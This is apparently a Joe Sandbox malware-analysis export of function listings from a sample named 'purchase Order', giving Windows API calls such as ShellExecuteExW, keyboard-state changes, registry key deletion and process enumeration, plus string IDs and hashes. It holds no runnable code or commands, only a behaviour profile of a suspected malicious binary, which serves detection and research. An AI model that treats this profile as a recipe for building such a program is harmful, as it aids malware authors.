                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7e3a3c3be6f15e0641589e463f6a73d1e922dd8fd9ff97a3fdcd09a9b2282ab7
                                                        • Instruction ID: 1ce347c467babc08ee1fbd3db5aa9ee82a79a7b46ed9056fe359f68c659c0bb4
                                                        • Opcode Fuzzy Hash: 7e3a3c3be6f15e0641589e463f6a73d1e922dd8fd9ff97a3fdcd09a9b2282ab7
                                                        • Instruction Fuzzy Hash: 40716DB4900109EFCB04CF9ACC89AEEBB74FF85315F148259F926A6251D7309A85CF65
                                                        APIs
                                                        • _memset.LIBCMT ref: 00CA225A
                                                        • _memset.LIBCMT ref: 00CA2323
                                                        • ShellExecuteExW.SHELL32(?), ref: 00CA2368
                                                          • Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
                                                          • Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF
                                                          • Part of subcall function 00C5C6F4: _wcscpy.LIBCMT ref: 00C5C717
                                                        • CloseHandle.KERNEL32(00000000), ref: 00CA242F
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00CA243E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                        • String ID: @
                                                        • API String ID: 4082843840-2766056989
                                                        • Opcode ID: 358b86407251fb5af00d113c447505e44cd9532399e435746b57136437f76562
                                                        • Instruction ID: ddba3f8b055fab51cad4f1805172ee511e23f33c7a69b42dd69c3f5a8b4c49a8
                                                        • Opcode Fuzzy Hash: 358b86407251fb5af00d113c447505e44cd9532399e435746b57136437f76562
                                                        • Instruction Fuzzy Hash: 2571B27490062ADFCF15EF98C881A9EB7F5FF49314F108059E856AB361CB30AE41DB94
                                                        APIs
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CAE1D5
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00CAE20D
                                                        • IsDlgButtonChecked.USER32(?,00000001), ref: 00CAE248
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00CAE269
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CAE281
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$ButtonCheckedLongWindow
                                                        • String ID: @U=u
                                                        • API String ID: 3188977179-2594219639
                                                        • Opcode ID: 7db5d5267bca775bdbb7b20ffdafa4a40762132832211fea3cdda62619eaa0c8
                                                        • Instruction ID: 5592fb4db340538a98cdc25a866f03510159dcbbc01d704627c11123159a4f19
                                                        • Opcode Fuzzy Hash: 7db5d5267bca775bdbb7b20ffdafa4a40762132832211fea3cdda62619eaa0c8
                                                        • Instruction Fuzzy Hash: E261B634600215AFDB20DF54CC94FAE77B9EF4A308F144459F569973A2C771AE40DB90
                                                        APIs
                                                        • GetParent.USER32(?), ref: 00C83DE7
                                                        • GetKeyboardState.USER32(?), ref: 00C83DFC
                                                        • SetKeyboardState.USER32(?), ref: 00C83E5D
                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C83E8B
                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C83EAA
                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C83EF0
                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C83F13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: 4d7e6f6165752586d3005653ecbcbfe0bd076f7262436a406a9a60061195545b
                                                        • Instruction ID: 479421d1b215fde83847a03d417240812234aae90d4ffd4a3c67cfed56c86bfe
                                                        • Opcode Fuzzy Hash: 4d7e6f6165752586d3005653ecbcbfe0bd076f7262436a406a9a60061195545b
                                                        • Instruction Fuzzy Hash: 1C51F5A0A047D53DFB366364CC49BBA7EA55B06B08F085489F1E5468C2D3E8EFC4D758
                                                        APIs
                                                        • GetParent.USER32(00000000), ref: 00C83C02
                                                        • GetKeyboardState.USER32(?), ref: 00C83C17
                                                        • SetKeyboardState.USER32(?), ref: 00C83C78
                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C83CA4
                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C83CC1
                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C83D05
                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C83D26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessagePost$KeyboardState$Parent
                                                        • String ID:
                                                        • API String ID: 87235514-0
                                                        • Opcode ID: e107a127402edda11d2415d41e7d8424e8f1811b21bed51928413390fca53ca7
                                                        • Instruction ID: 561e64c4b95c461e486bbf1b7e6186e1cbe1ef5f8f3462672e56540346e0de40
                                                        • Opcode Fuzzy Hash: e107a127402edda11d2415d41e7d8424e8f1811b21bed51928413390fca53ca7
                                                        • Instruction Fuzzy Hash: FD5149A05047D53DFB36A334CC05B7ABF986B06B08F089589E0E55A4C2D294EF84E768
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: _wcsncpy$LocalTime
                                                        • String ID:
                                                        • API String ID: 2945705084-0
                                                        • Opcode ID: 989ce19fa8786e851504a653ba5a2077dfdab0637cd4244c88b4362d464d5cfd
                                                        • Instruction ID: 31ea20969018ff6479abd9052722b6c46eaf398324707b1e6ffbd8a1db5b0919
                                                        • Opcode Fuzzy Hash: 989ce19fa8786e851504a653ba5a2077dfdab0637cd4244c88b4362d464d5cfd
                                                        • Instruction Fuzzy Hash: 34415076D14214B6DB20EBF4C8869CFB7ACDF05310F648966E518F3161FA34E615C3A9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @U=u
                                                        • API String ID: 0-2594219639
                                                        • Opcode ID: 72f5bf727e24f56b266b71050eac0fd73da4dbde2e317b1ab39c66a6f23677b3
                                                        • Instruction ID: e575f222e7f3b18982991eeeeb2d7983641f5685347bcd35da4c08fca372e2ce
                                                        • Opcode Fuzzy Hash: 72f5bf727e24f56b266b71050eac0fd73da4dbde2e317b1ab39c66a6f23677b3
                                                        • Instruction Fuzzy Hash: E741A779D0020AAFD714DF68CCC8FA97B68EB0A314F150165F96AA72D1C770AE51D750
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00CA3DA1
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CA3DCB
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00CA3E80
                                                          • Part of subcall function 00CA3D72: RegCloseKey.ADVAPI32(?), ref: 00CA3DE8
                                                          • Part of subcall function 00CA3D72: FreeLibrary.KERNEL32(?), ref: 00CA3E3A
                                                          • Part of subcall function 00CA3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00CA3E5D
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00CA3E25
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: 10a164f975e0b73ec744d60bdf2ac69d97f42716632c9e247415ae5cfd39f01a
                                                        • Instruction ID: 51e5823e6ff28b2d609e5c49588668eb2d1c9d9ad44fc1623dec51ca41e30f6e
                                                        • Opcode Fuzzy Hash: 10a164f975e0b73ec744d60bdf2ac69d97f42716632c9e247415ae5cfd39f01a
                                                        • Instruction Fuzzy Hash: AF31E8B191114ABFDB159B94DC99EFFB7BCEB09304F00016AF512E2150E6749F899BA0
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C808F2
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C80918
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00C8091B
                                                        • SysAllocString.OLEAUT32(?), ref: 00C80939
                                                        • SysFreeString.OLEAUT32(?), ref: 00C80942
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C80967
                                                        • SysAllocString.OLEAUT32(?), ref: 00C80975
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: f8fb187091dbe787f636bd670b7aa6a59749025c39c9b6388184edf26db69c94
                                                        • Instruction ID: d1d930280d5e277f897805703ce7e4aafe8279db34b97fa5a399dda4b4763978
                                                        • Opcode Fuzzy Hash: f8fb187091dbe787f636bd670b7aa6a59749025c39c9b6388184edf26db69c94
                                                        • Instruction Fuzzy Hash: 9121B576600208AFAB50EFA8DC88EAF73ACEB09365B108125F915DB151D670ED49CB64
                                                        APIs
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C7B88E
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C7B8A1
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C7B8D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u$ComboBox$ListBox
                                                        • API String ID: 3850602802-2258501812
                                                        • Opcode ID: eb87d921c9c13ed17516ef28b32955a67b4954624dab27a1b87face4c399b63d
                                                        • Instruction ID: bb37a22b692d1ae4e74c472d8f2bd3548285a4fe64eccf78aba3afc73df23653
                                                        • Opcode Fuzzy Hash: eb87d921c9c13ed17516ef28b32955a67b4954624dab27a1b87face4c399b63d
                                                        • Instruction Fuzzy Hash: E0210276900208BFDB44ABA4C886EFE777CEF05350F108129F56AA71E1DB744E0AA761
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: 823b0270734f4973703de20acbb58e2b02a2122a1e2dad18f512f5485dae1654
                                                        • Instruction ID: d3f5396384b6fef6fcaa5be9a49ad03ef5b45568569b4f7fa8a17f2742cbfbac
                                                        • Opcode Fuzzy Hash: 823b0270734f4973703de20acbb58e2b02a2122a1e2dad18f512f5485dae1654
                                                        • Instruction Fuzzy Hash: 26219E7114021177C331BA34CC0AF777398EFA4308F64403AF84697182E7619A82E3AD
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C809CB
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C809F1
                                                        • SysAllocString.OLEAUT32(00000000), ref: 00C809F4
                                                        • SysAllocString.OLEAUT32 ref: 00C80A15
                                                        • SysFreeString.OLEAUT32 ref: 00C80A1E
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00C80A38
                                                        • SysAllocString.OLEAUT32(?), ref: 00C80A46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 6afa7c2322a63f32cf24d62440455d8d231c44653c1e6a9d31c77111cb3d4d8e
                                                        • Instruction ID: 3864dbf1377b667a80acc5c523a4b3c992a1baa2a200044a3dfd163ead3f15d9
                                                        • Opcode Fuzzy Hash: 6afa7c2322a63f32cf24d62440455d8d231c44653c1e6a9d31c77111cb3d4d8e
                                                        • Instruction Fuzzy Hash: BB21B835200204AFDB14EFA8CC89EBB73ECEF09364B108135F919CB161D670ED859754
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00C7DBD7
                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C7DBF4
                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00C7DC2C
                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00C7DC52
                                                        • _wcsstr.LIBCMT ref: 00C7DC5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                        • String ID: @U=u
                                                        • API String ID: 3902887630-2594219639
                                                        • Opcode ID: 0834b24ddeb528c2217d27bbdbcf267361a03e4384b35870d5ea8d62dc96bd1a
                                                        • Instruction ID: 14fcef2c689d9dec525ab5479e410fd71160c37e7b650eeca8bc95bf1cfd05c4
                                                        • Opcode Fuzzy Hash: 0834b24ddeb528c2217d27bbdbcf267361a03e4384b35870d5ea8d62dc96bd1a
                                                        • Instruction Fuzzy Hash: 3221F571204100BBEB265B79DC49E7F7BA8DF45760F108039F80FDA191EAA1C941E2A0
                                                        APIs
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C7BC90
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C7BCC2
                                                        • __itow.LIBCMT ref: 00C7BCDA
                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00C7BD00
                                                        • __itow.LIBCMT ref: 00C7BD11
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID: @U=u
                                                        • API String ID: 3379773720-2594219639
                                                        • Opcode ID: 6c54bb06f821be30e639c2f3e24e2e454296c786a4d77a0bca6e277db3311f13
                                                        • Instruction ID: 5484a917e722e2d9f68422eb7188fa9b644855340000f042ab5df69b6f901bf6
                                                        • Opcode Fuzzy Hash: 6c54bb06f821be30e639c2f3e24e2e454296c786a4d77a0bca6e277db3311f13
                                                        • Instruction Fuzzy Hash: CD21D835700618BBDB21AE658C86FDF7B68EF59710F008435FE5AEB181DB708D0597A1
                                                        APIs
                                                          • Part of subcall function 00C5D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C5D1BA
                                                          • Part of subcall function 00C5D17C: GetStockObject.GDI32(00000011), ref: 00C5D1CE
                                                          • Part of subcall function 00C5D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5D1D8
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CAA32D
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CAA33A
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CAA345
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CAA354
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CAA360
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 05834a53e4101d4f2ff8b621760b7d8ef921c831af3f7fbada46c1ff5f823601
                                                        • Instruction ID: 2472239360502ba21c8bbc4304513e133ed4487c85104b4d230765ce2cc0746c
                                                        • Opcode Fuzzy Hash: 05834a53e4101d4f2ff8b621760b7d8ef921c831af3f7fbada46c1ff5f823601
                                                        • Instruction Fuzzy Hash: 9C1190B115021ABEEF159F60CC85EEB7F6DFF09798F014114FA09A60A0C7729C21DBA4
                                                        APIs
                                                        • GetClientRect.USER32(?,?), ref: 00C5CCF6
                                                        • GetWindowRect.USER32(?,?), ref: 00C5CD37
                                                        • ScreenToClient.USER32(?,?), ref: 00C5CD5F
                                                        • GetClientRect.USER32(?,?), ref: 00C5CE8C
                                                        • GetWindowRect.USER32(?,?), ref: 00C5CEA5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID: Rect$Client$Window$Screen
                                                        • String ID:
                                                        • API String ID: 1296646539-0
                                                        • Opcode ID: 1fde4a2bad56271da5fe8ded988a99f0ed3669e92582f822c423e7b9943a02ab
                                                        • Instruction ID: 53f771a9b27c73475b2940c017e20bc8a27e5367921ddca0b9fe3214cc9a2374
                                                        • Opcode Fuzzy Hash: 1fde4a2bad56271da5fe8ded988a99f0ed3669e92582f822c423e7b9943a02ab
                                                        • Instruction Fuzzy Hash: 39B14A79900249DFDB10CFA9C4817EDB7B1FF08701F149529EC69EB250DB70AA94DB68
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00CA1C18
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00CA1C26
                                                        • __wsplitpath.LIBCMT ref: 00CA1C54
                                                          • Part of subcall function 00C61DFC: __wsplitpath_helper.LIBCMT ref: 00C61E3C
                                                        • _wcscat.LIBCMT ref: 00CA1C69
                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00CA1CDF
                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00CA1CF1
